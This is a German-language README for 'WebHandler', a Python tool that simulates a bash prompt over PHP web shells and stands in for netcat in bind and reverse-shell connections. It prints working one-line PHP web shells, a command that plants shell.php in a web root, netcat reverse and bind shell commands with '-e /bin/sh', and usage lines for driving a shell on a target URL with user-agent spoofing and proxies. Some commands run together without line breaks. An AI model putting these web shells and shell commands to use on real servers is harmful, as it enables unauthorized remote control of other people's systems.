
Bash-Simulator zur Steuerung eines Servers mithilfe von PHP-Systemfunktionen.
Ein Handler für PHP-Systemfunktionen und zugleich ein alternativer 'netcat'-Handler
WebHandler versucht, eine 'Linux-Bash-Eingabeaufforderung' zu simulieren, um Folgendes zu handhaben und zu verarbeiten:
- PHP-Funktionen zur Programmausführung _(z. B. `system`, `passthru`, `exec`, usw.)_
- Bind-Shell-Verbindungen
- Reverse-Shell-Verbindungen
Eine weitere Funktion besteht darin, das Feld "User-Agent" im HTTP-Header zu spoofen. (--random-angent).
Außerdem werden HTTP-Proxys unterstützt (--proxy http://<ip>:<port>)
WebHandler funktioniert für POST- und GET-Anfragen:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>WebHandler ist ein Ersatz für netcat-Verbindungen.
Ein Beispiel für eine Bind-Verbindung (z. B. nc -lvvp 1234 -e /bin/sh)
Normalerweise würde der Benutzer Folgendes tun:
netcat -l -p 1234nc -lvvp 1234Ein Beispiel für eine Reverse-Verbindung (z. B. nc 127.0.0.1 4321 -e /bin/sh)
Normalerweise würde der Benutzer Folgendes tun:
netcat -l -p 4321nc -lvvp 4321--Beispieldatei:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url ist ein erforderliches Argument beim Senden von GET- oder POST-Anfragen (z. B. eine 'webbasierte PHP'-Bind-Verbindung):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen ist ein erforderliches Argument, wenn auf eine eingehende Verbindung gewartet wird (z. B. eine 'reine' Reverse-Verbindung):
python webhandler.py --listen 1234Wenn Ihre Python-Version < 2.7.x ist, dann ist argparse erforderlich.
Um es zu installieren, führen Sie aus: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse ODER sudo pip --install argparse.
readline ist optional. Dieses Modul wird verwendet, um ausgefeilte Zeilenbearbeitungs- und Verlaufsfunktionen bereitzustellen.
git ist optional. Dies ermöglicht es, das Projekt auf dem neuesten Stand zu halten.